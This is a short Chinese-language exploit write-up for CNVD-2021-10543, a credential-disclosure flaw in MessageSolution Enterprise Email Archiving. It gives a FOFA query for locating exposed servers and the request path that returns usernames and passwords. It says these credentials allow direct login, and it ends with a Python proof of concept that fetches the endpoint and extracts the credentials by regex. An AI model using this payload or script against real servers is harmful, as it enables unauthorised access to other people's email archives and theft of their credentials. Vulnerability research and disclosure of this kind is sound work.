MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)
1.漏洞描述
MessageSolution企业邮件归档管理系统 / MessageSolution Enterprise Email Archiving (EEA) 是北京易讯思达科技开发有限公司开发的一款邮件归档系统。
该系统存在信息泄露漏洞,泄露用户名和密码。
2.复现过程
fofa:title=“MessageSolution Enterprise Email Archiving (EEA)”
payload:/authenticationserverservlet
浏览器访问https://IP/authenticationserverservlet
获取到账号和密码,可以直接用这个账号密码登录。
3.POC
import requests
import re
target = "http://IP"
url = target + "/authenticationserverservlet"
res = requests.get(url, verify=False)
regex1 = "<username>(.*?)</username>"
regex2 = "<password>(.*?)</password>"
match1 = re.findall(regex1, res.text)
match2 = re.findall(regex2, res.text)
if res.status_code == 200 and match1 and match2:
print("success")
else:
print("no vulnerability")
4.refer
https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ